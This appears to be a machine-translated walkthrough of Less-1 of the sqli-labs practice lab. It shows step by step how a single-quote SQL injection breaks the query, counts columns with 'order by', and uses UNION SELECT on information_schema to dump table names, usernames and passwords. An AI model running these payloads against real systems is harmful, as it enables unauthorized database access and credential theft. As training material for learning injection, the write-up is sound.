Remember to php.in Escape parameters in magic_quotes_gpc configure Off：

Otherwise, the symbols in the sent request parameters will be added \ escape , Therefore, it cannot be directly spliced to SQL Go in the statement

Less-1 GET - Error based - Single quotes - String( Based on error GET Single quote character Injection )

The first level prompts us to enter ID As parameters and values
Inquire about id=1：

Shows
Your Login name:Dumb
Your Password:Dumb
Inquire about id=1’

There is an error , Output 1’ Spliced into ’1’’ LIMIT 0,1
limit 0,1, From the number in your watch 0 Data start , Read only one
Inquire about 1’ and ‘1’='2

No results
Inquire about 1’ and ‘1’='1

Normal return result
It is proved that the query results can be successfully spliced
Inquire about 1’ or 1=1; --+ All data in the table can be returned

SELECT * FROM users WHERE id='1' or 1=1; -- ' LIMIT 0,1

But in the source code mysql_fetch_array Function gets only one row from the result set at a time as an associative array ：

So only one row of data will be displayed on the front end at a time

Next, let's query how many columns of data there are in this table , First, return the result according to 1,2,3 Column sorting ：
Inquire about

1' order by 3;--+

All return normally , Prove that there are at least three columns of data in the table
Inquire about

1' order by 4;--+

No first 4 Column , Explain that there are only three columns of data in the table
So let's use union Join query to find the data in the table
Inquire about

0' union select 1,2,3 --+

Inquire about 3 Column return data , Only 2 and 3, It means that our injection point can only be 2 and 3

2、 Guess database

Query the current database name

0' union select 1,database(),3 --+

The current database name is security
You can also view the names of all databases ：

0' union select 1,group_concat(schema_name),3 from information_schema.schemata --+

Get the names of all databases ：information_schema,challenges,mysql,performance_schema,security,sys

3、 Guess database tables ︰

Then check security Table name under database

id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

obtain security Table name under database ：emails,referers,uagents,users

4、 Guess fields

see users What fields are there under the table

id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema="security" and table_name="users" --+

Next, we can read the values of user name and password

id=0' union select 1,group_concat(username),3 from security.users --+

Read the value of the password ：

id=0' union select 1,group_concat(password),3 from security.users --+

Successfully read the field value in the database